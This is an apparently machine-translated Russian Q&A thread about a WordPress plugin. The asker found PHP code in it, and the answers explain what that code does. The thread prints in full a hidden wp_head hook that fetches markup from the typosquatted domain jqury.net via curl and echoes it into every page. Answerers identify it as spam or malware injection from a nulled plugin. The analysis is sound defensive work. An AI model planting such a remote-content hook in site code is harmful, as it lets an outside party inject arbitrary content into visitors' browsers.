Я нашел это в плагине. Что оно делает? Это опасно?

17

Я нашел это в плагине. Что оно делает? Это опасно?

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}
plugins  wp-admin  security  curl 
София Роуз
источник
5
Какой плагин это?
Даниэль
Вы получили плагин с официального сайта WP?
Этот бразильский парень
1
Это был плагин, который один из моих клиентов хотел, чтобы я запустил установку по сети. Плагин хотел запустить это в wp-admin. Прочитав это, я спросил его, откуда это. Это nulled плагин от торрента. Короткий ответ был: НЕТ ХХХ
София Роуз

Ответы:

16

Он загружает блок разметки, содержащий спам (я думал о публикации небольшого количества исходного кода, но я не хочу рекламировать контент каким-либо образом) из домена, который является почти неправильным написанием домена http://jquery.com/- - используется jQuery уважаемая и популярная библиотека Javascript и библиотека WordPress, включенная в ядро. Я думаю, что идея заключается в том, чтобы загружать эту библиотеку, хотя на самом деле загружается что-то совсем другое.

И другими способами он пытается загрузить jQuery. Обратите внимание на имя переменной $jquery.

Он также может пытаться загрузить вредоносные скрипты. Я не проверял. Я бы определенно назвал это опасным, тем более что содержимое этой страницы может измениться в любое время, когда контроллеры домена захотят этого.

В лучшем случае это повредит вашему сайту, так как поисковые системы смотрят вниз на сайты, распространяющие спам.

Не используйте это. Это не приносит никакой пользы ни вам, ни кому-либо еще в Интернете, кроме людей, которые управляют сайтом. Если вы нашли это на авторитетном сайте, сообщите об этом им.

s_ha_dum
источник
7

Да, это опасный код, загружающий контент со спам-сайта.

Вы не назвали плагин, но если вы нашли этот код после того, как он был установлен на вашем веб-сайте, возможно, что код плагина не был получен от разработчика, как этот, а вместо этого был взломан после его установки. Если это так, вы можете найти вредоносный код на большей части вашего сайта, чем просто этот плагин.

Проверьте загруженный код плагина, откуда он изначально был, и посмотрите, был ли этот вредоносный код там изначально. Если нет, то ваш сайт был взломан. Если вы решите, что это так, прочитайте эту статью из Кодекса .

Бен Миллер - Восстановить Монику
источник
3
Это был плагин, который один из моих клиентов хотел, чтобы я запустил установку по сети. Плагин хотел запустить это в wp-admin. Прочитав это, я спросил его, откуда это. Это nulled плагин от торрента. Короткий ответ был: НЕТ ХХХ
София Роуз
Используя наш сайт, вы подтверждаете, что прочитали и поняли нашу Политику в отношении файлов cookie и Политику конфиденциальности.
Licensed under cc by-sa 3.0 with attribution required.